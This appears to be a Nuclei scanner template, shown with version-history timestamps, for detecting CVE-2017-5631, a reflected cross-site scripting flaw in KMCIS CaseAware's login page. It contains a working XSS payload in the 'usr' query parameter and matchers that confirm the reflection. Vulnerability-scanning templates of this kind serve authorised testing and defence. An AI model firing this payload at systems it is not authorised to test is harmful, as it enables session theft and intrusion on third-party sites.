2022-04-13 10:41:03 +00:00
id : CVE-2017-5631
info :
2022-04-15 12:16:56 +00:00
name : CaseAware - Cross Site Scripting
2022-04-13 10:41:03 +00:00
author : edoardottt
severity : medium
description : An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string.
2022-04-15 12:16:56 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631
2022-05-17 09:18:12 +00:00
- https://www.openbugbounty.org/incidents/228262/
- https://www.exploit-db.com/exploits/42042/
2022-04-13 10:41:03 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2017-5631
cwe-id : CWE-79
tags : cve,cve2017,xss,caseaware
requests :
- method : GET
path :
2022-04-15 12:16:56 +00:00
- "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-04-13 10:41:03 +00:00
matchers-condition : and
matchers :
- type : word
2022-04-15 12:16:56 +00:00
part : body
2022-04-13 10:41:03 +00:00
words :
2022-04-15 12:16:56 +00:00
- "'></script><script>alert(document.domain)</script>"
2022-04-13 10:41:03 +00:00
- type : word
2022-04-15 12:16:56 +00:00
part : header
2022-04-13 10:41:03 +00:00
words :
2022-04-15 12:16:56 +00:00
- text/html
- type : status
status :
- 200